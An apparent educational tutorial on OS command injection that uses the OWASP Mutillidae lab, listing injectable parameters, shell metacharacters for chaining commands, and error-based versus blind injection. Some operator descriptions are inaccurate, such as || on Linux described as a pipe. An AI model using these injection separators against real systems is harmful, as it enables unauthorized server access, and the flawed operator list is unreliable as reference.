OS command injection is refer as shell injection attack arise when an
attacker try to perform system level commands through a vulnerable
application in order to retrieve information of web server ot try to
make unauthorized access into server.
Framework (Java, PHP and ASP DOT NET) has a flaw that call the system
to run the commands into the server.
Verify parameters
to inject data:
The following parameters should be tested for command injection
flaws, as the application may be using one of these parameters to
build a command back at the web server,
→ GET: In this method, input parameters are sent in URLs
→ POST: In this method, input parameters are sent in HTTP body
→ HTTP header: Applications frequently use header fields to
discover end users and display requested information to the user
based on the value in the headers
Some of the important header fields to check for command injection
are,
→ Cookies
→ X-Forwarded-For
→ User-agent
→ Referrer
Metacharacter:
Using any of the vulnerable scanner attacker may come to know that
the targeted web application is vulnerable for command injection and
try injecting system level unwanted command using Meta character.
Metacharacter are symbolic operators which are use to separate
actual command from unwanted command. The ampercent (&) was used
as a separator that would divide the authentic input and the command
that you are trying to inject.
In this entire exercise, We will be using “OWASP Mutillidae”
To locate command injection vulnerabilities we can send input into
vulnerable field and then observer the response coming back from the
application.
We can use the different symbols that shell will interpret as a
separator between two commands.
OS Command
Injection Operators:
The developer possibly will set filters to obstruct the some
metacharacter. This would block our injected data, and thus we need
to try out with other metacharacters too.
Operators with description,
; → → The shell would run all the commands in sequence
separated by the semicolon
& → → It separates multiple commands on one command
line. It runs the first then moved to second command
&& → → It runs the command following &&
only if the preceding command is successful
|| (Windows) → → It runs the command following || only if
the preceding command fails
|| (Linux) → → Redirects standard outputs of the first command to
standard input of the second command
‘ → → The
unquoting metacharacter is used to force the shell to interpret and
run the command between the backticks. Eg., Variable=”OS version
uname -a” && echo $variable
() → → It
is used to nest commands
# → → It
is used as command line comment
Types of Command
Injection:
→ Error based
injection: When attacker
injects a command through an input parameter and the output is
displayed on the certain web page to proofs that the application
is vulnerable to the command injection.
→ Blind based
injection: The
results of the command that attacker inject will not displayed to the
attacker and no error messages are returned. The attacker will use
another technique to identify whether the command was really executed
on the server.